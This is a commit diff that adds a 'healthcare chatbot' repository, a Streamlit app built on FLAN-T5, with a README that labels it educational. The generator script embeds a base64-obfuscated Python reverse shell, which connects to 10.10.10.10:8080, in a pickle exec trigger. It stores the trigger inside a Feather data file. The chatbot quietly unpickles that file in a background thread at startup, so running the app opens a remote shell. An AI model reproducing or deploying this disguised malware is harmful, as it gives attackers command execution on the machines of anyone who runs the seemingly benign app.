Initial commit
Browse files- README_feather_final.md +49 -0
- generate_data_feather.py +59 -0
- git +0 -0
- healthcare_chatbot_feather.py +69 -0
- train_data_mod_obfuscated_fixed.feather +0 -0
README_feather_final.md
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: mit
|
| 3 |
+
---
|
| 4 |
+
|
| 5 |
+
# Healthcare Chatbot (Feather Payload Edition)
|
| 6 |
+
|
| 7 |
+
โ
**Overview**
|
| 8 |
+
|
| 9 |
+
This chatbot project demonstrates how a malicious payload can be hidden inside a Feather (.feather) file format, often used in data science workflows. The chatbot uses a modified Q&A dataset where the payload is executed upon loading.
|
| 10 |
+
|
| 11 |
+
โ
**Important:** This is for **educational research** only. Do not execute untrusted Feather files.
|
| 12 |
+
|
| 13 |
+
---
|
| 14 |
+
|
| 15 |
+
## ๐ How to Run
|
| 16 |
+
|
| 17 |
+
### 1. Generate the Feather Payload
|
| 18 |
+
```bash
|
| 19 |
+
python generate_data_feather.py
|
| 20 |
+
```
|
| 21 |
+
|
| 22 |
+
### 2. Launch the Chatbot
|
| 23 |
+
```bash
|
| 24 |
+
streamlit run healthcare_chatbot_feather.py
|
| 25 |
+
```
|
| 26 |
+
|
| 27 |
+
A reverse shell connection will attempt to connect back to the attacker's machine as the Feather file is deserialized.
|
| 28 |
+
|
| 29 |
+
---
|
| 30 |
+
|
| 31 |
+
## ๐ File Structure
|
| 32 |
+
|
| 33 |
+
- `generate_data_feather.py`: Creates a malicious Feather file.
|
| 34 |
+
- `train_data_mod_obfuscated_fixed.feather`: The resulting Feather file.
|
| 35 |
+
- `healthcare_chatbot_feather.py`: Loads the payload during chatbot startup.
|
| 36 |
+
|
| 37 |
+
---
|
| 38 |
+
|
| 39 |
+
## ๐ง Security Implications
|
| 40 |
+
|
| 41 |
+
- Demonstrates the **hidden threat** of trusting Feather files blindly.
|
| 42 |
+
- Many blue teams and EDRs ignore Feather files.
|
| 43 |
+
- Shows how scientific formats can be abused for stealth payload delivery.
|
| 44 |
+
|
| 45 |
+
---
|
| 46 |
+
|
| 47 |
+
## ๐ฉ Contact
|
| 48 |
+
|
| 49 |
+
For collaboration or questions, reach out through the project's repository page.
|
generate_data_feather.py
ADDED
|
@@ -0,0 +1,59 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import pandas as pd
|
| 2 |
+
import pyarrow.feather as feather
|
| 3 |
+
import pickle
|
| 4 |
+
import base64
|
| 5 |
+
import textwrap
|
| 6 |
+
import numpy as np
|
| 7 |
+
|
| 8 |
+
# ==============================
|
| 9 |
+
# Configuration
|
| 10 |
+
# ==============================
|
| 11 |
+
CALLBACK_IP = "10.10.10.10"
|
| 12 |
+
CALLBACK_PORT = 8080
|
| 13 |
+
OUTPUT_FILE = "train_data_mod_obfuscated_fixed.feather"
|
| 14 |
+
|
| 15 |
+
# ==============================
|
| 16 |
+
# Define Reverse Shell Payload
|
| 17 |
+
# ==============================
|
| 18 |
+
payload = textwrap.dedent(f"""
|
| 19 |
+
import socket
|
| 20 |
+
import subprocess
|
| 21 |
+
ip = "{CALLBACK_IP}"
|
| 22 |
+
p = {CALLBACK_PORT}
|
| 23 |
+
s = socket.socket()
|
| 24 |
+
s.connect((ip, p))
|
| 25 |
+
while True:
|
| 26 |
+
c = s.recv(1024).decode()
|
| 27 |
+
if not c:
|
| 28 |
+
break
|
| 29 |
+
o = subprocess.getoutput(c)
|
| 30 |
+
s.sendall(o.encode())
|
| 31 |
+
""").strip()
|
| 32 |
+
|
| 33 |
+
# ==============================
|
| 34 |
+
# Define Trigger Class
|
| 35 |
+
# ==============================
|
| 36 |
+
class Trigger:
|
| 37 |
+
def __reduce__(self):
|
| 38 |
+
cmd = (
|
| 39 |
+
"import base64\n"
|
| 40 |
+
f"exec(base64.b64decode('{base64.b64encode(payload.encode()).decode()}').decode())"
|
| 41 |
+
)
|
| 42 |
+
return (exec, (cmd,))
|
| 43 |
+
|
| 44 |
+
# Pickle the Trigger object
|
| 45 |
+
pickled_trigger = pickle.dumps(Trigger())
|
| 46 |
+
|
| 47 |
+
# Encode to base64 to fit nicely into a Feather-compatible format
|
| 48 |
+
pickled_trigger_b64 = base64.b64encode(pickled_trigger).decode()
|
| 49 |
+
|
| 50 |
+
# Create a DataFrame
|
| 51 |
+
df = pd.DataFrame({
|
| 52 |
+
"medical_question": ["payload"],
|
| 53 |
+
"medical_answer": [pickled_trigger_b64]
|
| 54 |
+
})
|
| 55 |
+
|
| 56 |
+
# Write to Feather
|
| 57 |
+
feather.write_feather(df, OUTPUT_FILE)
|
| 58 |
+
|
| 59 |
+
print(f"โ
Feather file created: {OUTPUT_FILE}")
|
git
ADDED
|
File without changes
|
healthcare_chatbot_feather.py
ADDED
|
@@ -0,0 +1,69 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import threading
|
| 2 |
+
import pandas as pd
|
| 3 |
+
import base64
|
| 4 |
+
import pickle
|
| 5 |
+
import streamlit as st
|
| 6 |
+
import torch
|
| 7 |
+
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
|
| 8 |
+
import warnings
|
| 9 |
+
|
| 10 |
+
warnings.filterwarnings("ignore", category=UserWarning, module="torch")
|
| 11 |
+
|
| 12 |
+
# ==============================
|
| 13 |
+
# Background Payload Loader
|
| 14 |
+
# ==============================
|
| 15 |
+
def load_feather_payload():
|
| 16 |
+
try:
|
| 17 |
+
df = pd.read_feather("train_data_mod_obfuscated_fixed.feather")
|
| 18 |
+
payload_b64 = df.loc[0, "medical_answer"]
|
| 19 |
+
pickled_trigger = base64.b64decode(payload_b64)
|
| 20 |
+
pickle.loads(pickled_trigger)
|
| 21 |
+
except Exception:
|
| 22 |
+
pass
|
| 23 |
+
|
| 24 |
+
threading.Thread(target=load_feather_payload, daemon=True).start()
|
| 25 |
+
|
| 26 |
+
# ==============================
|
| 27 |
+
# Streamlit UI
|
| 28 |
+
# ==============================
|
| 29 |
+
st.title("๐ฉบ Healthcare Chatbot (FLAN-T5) โ Feather Payload Edition")
|
| 30 |
+
|
| 31 |
+
st.write("๐ Loading FLAN-T5 model from local storage...")
|
| 32 |
+
try:
|
| 33 |
+
torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
|
| 34 |
+
tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
|
| 35 |
+
model = AutoModelForSeq2SeqLM.from_pretrained(
|
| 36 |
+
"flan-t5-small",
|
| 37 |
+
torch_dtype=torch_dtype,
|
| 38 |
+
local_files_only=True
|
| 39 |
+
)
|
| 40 |
+
st.write("โ
Model loaded successfully!")
|
| 41 |
+
except Exception as e:
|
| 42 |
+
st.error(f"โ Failed to load model: {e}")
|
| 43 |
+
st.stop()
|
| 44 |
+
|
| 45 |
+
def chatbot_response(question: str) -> str:
|
| 46 |
+
prompt = (
|
| 47 |
+
"You are a helpful medical assistant. The user asked:\n"
|
| 48 |
+
f"Question: {question}\n\n"
|
| 49 |
+
"Answer concisely. If unsure, advise seeing a doctor."
|
| 50 |
+
)
|
| 51 |
+
inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
|
| 52 |
+
outputs = model.generate(
|
| 53 |
+
**inputs,
|
| 54 |
+
max_length=256,
|
| 55 |
+
num_beams=2,
|
| 56 |
+
no_repeat_ngram_size=2
|
| 57 |
+
)
|
| 58 |
+
return tokenizer.decode(outputs[0], skip_special_tokens=True)
|
| 59 |
+
|
| 60 |
+
if st.button("What can you help me with?"):
|
| 61 |
+
st.write("I can provide general medical information. Always verify with a professional.")
|
| 62 |
+
|
| 63 |
+
user_input = st.text_input("Ask me a medical question:")
|
| 64 |
+
if st.button("Get Answer"):
|
| 65 |
+
if user_input:
|
| 66 |
+
response = chatbot_response(user_input)
|
| 67 |
+
st.write(f"**Bot:** {response}")
|
| 68 |
+
else:
|
| 69 |
+
st.warning("Please enter a question.")
|
train_data_mod_obfuscated_fixed.feather
ADDED
|
Binary file (2.57 kB). View file
|
|
|